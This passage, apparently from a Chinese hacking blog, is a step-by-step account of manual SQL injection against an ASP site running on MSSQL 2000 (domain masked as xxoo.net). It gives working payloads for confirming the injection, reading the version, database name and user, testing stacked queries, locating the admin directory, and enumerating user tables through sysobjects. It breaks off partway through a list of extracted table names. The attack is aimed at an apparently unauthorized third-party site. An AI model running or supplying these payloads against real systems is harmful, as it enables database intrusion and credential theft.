MSSQL手工注入并提权作者：海默Blog：http://hi.baidu.com/chjxhyy/目标站：HYPERLINK"http://www.xxoo.net"http://www.xxoo.net在首页随便点几个链接，加’测试是否存在注入在该链接下报错了。。[Microsoft][ODBCSQLServerDriver][SQLServer]字符串'237'orderbypu_idasc'之前有未闭合的引号。HYPERLINK"http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237"http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237'（为了避免利用搜索引擎搜到，所以隐藏的比较深）是字符型的。字段后面还有orderby语句，用--注释掉就okHYPERLINK"http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237"http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237'and1=1--正确HYPERLINK"http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237"http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237'and1=2--报错存在注入，下面习惯性的就是爆表和爆字段。。先查看下基本信息：查看MSSQL数据库版本HYPERLINK"http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237"http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237'and0<>(select@@version)—为sqlserver2000的。查看当前数据库HYPERLINK"http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237"http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237'anddb_name()>0—当前库的用户HYPERLINK"http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237"http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237'anduser>0—是否支持多语句查询HYPERLINK"http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237"http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237';declare@aint—可以。。爆表之前还是先找下目录吧，免得得到账号密码找不到后台，不白瞎了。。url后面加admin，禁止列目录，后面加个几个常见的都不对，login.asp、admin.asp等等还是wwwscan扫下吧，原来是admin_main_asp，点击访问下登陆超时，然后转到了system目录，原来是这个http://www.xxoo.net/systemOk，下面爆表吧，第一个HYPERLINK"http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237"http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237'and(selecttop1namefromsysobjectswherextype='u')>0—第二个、、HYPERLINK"http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237"http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237'and(selecttop1namefromsysobjectswherextype='u'andnamenotin('sdlabout'))>0—以此类推，爆出如下表：'zxkd','yjcx_qs','yjcx_md','yjcx','t_shop','t_publish','t_project','t_logins','t_functions','t_employee_functions','t_employee','sqyj','shopwin','sdlnews','sdlhome','sdl_member_old','sdl_mem